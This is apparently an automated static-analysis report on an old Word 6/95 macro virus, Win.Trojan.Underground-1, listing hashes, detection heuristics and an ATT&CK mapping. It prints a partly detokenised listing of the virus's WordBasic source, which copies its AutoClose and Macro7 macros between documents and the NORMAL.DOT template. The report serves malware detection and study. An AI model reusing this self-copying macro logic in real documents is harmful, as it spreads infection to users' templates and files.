Win.Trojan.Underground-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 a8bdc016a728118b…

MALICIOUS

Office (OLE)

Size: 8.0 KB · First seen: 2012-06-14
MD5: 5183836d786dfa0877158059c58fea40
SHA-1: 4abbbd655560dbbf0000765264e8b5712cbfed2f
SHA-256: a8bdc016a728118b351ca1c5a1c5f9fb3a0e5e5df0f6c2b79298c482c33b45e3
Risk Score: 102

Malware Insights

Win.Trojan.Underground-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

This file carries the traits of a legacy WordBasic macro virus: the analyzer identified the 'RSN MACRO VIRUS' marker, and the carved macro source shows an explicit attempt to install itself into the user's NORMAL.DOT global template. The first MAIN routine asks the user "Can I install myself into your NORMAL.DOT" (dialog title "SoftWare UnderGround") and then builds MacroCopy command strings that copy the document's Macro7 and AutoClose macros into \normal:Macro7 and \normal:AutoClose; the second MAIN routine reverses the direction, copying those macros from NORMAL.DOT into the active document, which is the classic two-way WordBasic infection loop. In both routines the generated commands, terminated by "DocClose 2", appear to be staged in a macro named "Temp". ClamAV independently classifies the sample as Win.Trojan.Underground-1.

Heuristics (3)

  • ClamAV: Win.Trojan.Underground-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Underground-1.
  • Legacy WordBasic macro-virus markers (high, OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    The OLE Word document contains legacy WordBasic auto-execution markers (AutoOpen and its relatives) together with macro-manipulation commands (ToolsMacro, MacroFile, fileMacro, globMacro), or strings naming historical macro viruses. Word 6/95 macros are not exposed as a modern VBA project, so standard VBA source extraction can miss them entirely.
  • Recovered legacy WordBasic macro source (info, OLE_LEGACY_WORDBASIC_MACRO_SOURCE)
    A Word 6.0/95 document stores its WordBasic macros in tokenised form inside the WordDocument stream rather than as a VBA project, so VBA source extraction cannot see them. The analyzer detokenised and carved the macro source so that its identifiers, string literals (file paths, URLs, registry keys, message text) and comments are available for review and signature scanning.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: wordbasic_macros.txt
Kind: wordbasic-macro
Source: analyzer.wordbasic (detokenised Word 6/95 WordBasic macro source)
Size: 2370 bytes
SHA-256: b6684b8679557dd5cc1ddd0d9b2c269be42c21d0b41256807f4012d804cf7f31

Preview: first 1,000 lines of the extracted script. The @cmdXXXX entries appear to be WordBasic opcodes the detokeniser could not resolve to a name; identifiers, string literals and the two MAIN routines are readable as-is.
= 29551
MAIN
@cmd809e
dlg @cmd0056
@cmd0209
@cmdc001 1 , 1
@cmd8081
@cmd8111 0
NeedName$ = "AutoClose"
count = 1 @cmd80b7 0
@cmd80b8 count , 0 = NeedName$ * finish
count
action = @cmd802b "Can I install myself into your NORMAL.DOT" ,
"SoftWare UnderGround" , 4
action 0
path$ = @cmd8025
A$ = REM  empty line
B$ =
count = 1 @cmd80b7 1
currentname$ = @cmd80b8 count , 1
@cmd80be currentname$
"LQMacro7"
A$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," =
@cmd8005 34 = @cmd818c 2 = "\normal:Macro7" = @cmd8005 34
"LQAutoClose"
B$ = "MacroCopy" = @cmd8005 34 = path$ = ":" = currentname$ = @cmd8005 34 = "," =
@cmd8005 34 = @cmd818c 2 = "\normal:AutoClose" = @cmd8005 34
count
@cmd00d7 = "Temp" ,
@cmdc001 1 , 1
@cmd8012 A$
@cmd8012 @cmd8005 11 = @cmd8005 13 = B$
@cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2"
@cmd00d7 = "Temp" ,
dlg
author$ = dlg
author$ = author$ = "Unknown User"
@cmd802b "This doc was created by " = author$ = " at " = dlg = @cmd8005 13 =
"saved before now " = dlg 1792 " times, last saving by " = dlg = @cmd8005 13 = dlg = " characters, " = dlg =
" words, " = dlg = " lines, " = dlg = " pages" ,
"SoftWare UnderGround" , 0
Empty
MAIN
@cmd809e
@cmd8111 0
@cmd0054 = 1
cntm = @cmd80b7 1
present = 0
cntm 0
count = 1 cntm
name$ = @cmd80b8 count , 1
@cmd80be name$
"LQMacro7"
cn1$ = name$
present = present = 1
"LQAutoClose"
cn2$ = name$
present = present = 2
count
Macro7
present = 3 * form
path$ = @cmd8025
A$ =
B$ =
present = 1 present = 0 REM  AutoClose not found
namecl$ = "AutoClose" = @cmd8005 34
cn2$ = @cmd8005 65 = @cmd80ff @cmd80f7 23 = 3 = @cmd80ea @cmd8007 @cmd80ff @cmd80f7 = @cmd80f5 @cmd80f7
B$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namecl$ = "," = @cmd8005 34 =
path$ = ":" = cn2$ = @cmd8005 34 = ",1"
present = 2 present = 0 REM  Macro7 not found
namevm$ = "Macro7" = @cmd8005 34
cn1$ = @cmd8005 65 = @cmd80f4 @cmd80f7 = @cmd80ea @cmd8007 @cmd80f4 @cmd80f7 = @cmd80f5 @cmd80f7
A$ = "MacroCopy " = @cmd8005 34 = @cmd818c 2 = "\normal:" = namevm$ = "," =
@cmd8005 34 = path$ = ":" = cn1$ = @cmd8005 34 = ",1"
@cmd00d7 = "Temp" ,
@cmd8012 A$
@cmd8012 @cmd8005 11 = @cmd8005 13 = B$
@cmd8012 @cmd8005 11 = @cmd8005 13 = "DocClose 2"
@cmd00d7 = "Temp" ,
@cmdc010
@cmd015d
@cmd0161 = cn1$ , = , = 1 , = "Text1" ,
= 0 , = "1" , = , = , = 0 ,
= 0 , = , = 0 , =
@cmd01f7 = , = 0 , = 2
@cmd0053